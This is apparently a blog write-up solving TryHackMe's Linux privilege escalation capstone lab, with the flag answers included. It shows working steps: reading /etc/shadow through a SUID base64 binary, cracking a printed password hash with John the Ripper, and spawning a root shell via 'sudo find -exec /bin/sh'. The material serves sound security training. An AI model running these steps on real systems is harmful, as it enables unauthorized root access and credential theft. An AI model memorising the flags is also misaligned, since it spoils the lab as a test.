This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Capstone Challenge tasks so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Linux Privilege Escalation: Capstone Challenge Solution
What is the content of the flag1.txt file?
- Let's gather info first about the machine
history
whoami
uname -a
uname -r
/proc/version
/etc/issue
ps
sudo -l
ls
id
ifconfig
netstat -a
netstat -at
netstat -au
netstat -l
env
Let's go to /home where we will discover that there are two other users
missy
androotflag
. From the history we know that the flag2.txt is in rootflag user. So chances are theflag1.txt
is in/home/missy
.Let's first try checking if there is a kernel exploit.
Let's make a quick look for a kernel exploit for version. 3.10.0-1160.el7.x86_64
Let's check for sudo rights
sudo -l
. Unfortunatelyleonard
has no sudo rights.Check for SUID privileges.
find / -type f -perm -04000 -ls 2>/dev/null
There are multiple binaries which our current user has SUID access. Let's go to https://gtfobins.github.io/#+suid to check if we can exploit any of these for root access.
We can exploit base64
to read /etc/passwd
and /etc/shadow
and find information about user missy
. Unfortunately we can't find any info about rootflag
in these files.
LFILE=/etc/passwd
base64 "$LFILE" | base64 --decode
missy:x:1001:1001::/home/missy:/bin/bash
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
Let's try cracking the password for
missy
. Create a local filepasswd.txt
andshadow.txt
and copy the content from the target machine.Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run john the ripper on
passwords.txt
. Where we find that the password formissy
is Password1
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
- Now on the target machine let's switch user to
missy
and use the password **Password1
su missy
cd /home/missy/Documents
cat flag1.txt
Answer: THM-42828719920544
What is the content of the flag2.txt file?
Continuing from what we have done above, the current user is now
missy
. Let's check her privileges by runningsudo -l
We find out that user
missy
has sudo priviliges forfind
. Looking at https://gtfobins.github.io/#+sudo, we discover we have sudo exploits for thefind
binary.Let's execute what we have found in GTFObins which will spawn a terminal with root privileges.
sudo find . -exec /bin/sh \; -quit
- Now let's find out the content of
flag2.txt
which is found in/home/rootflag
Answer: THM-168824782390238
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)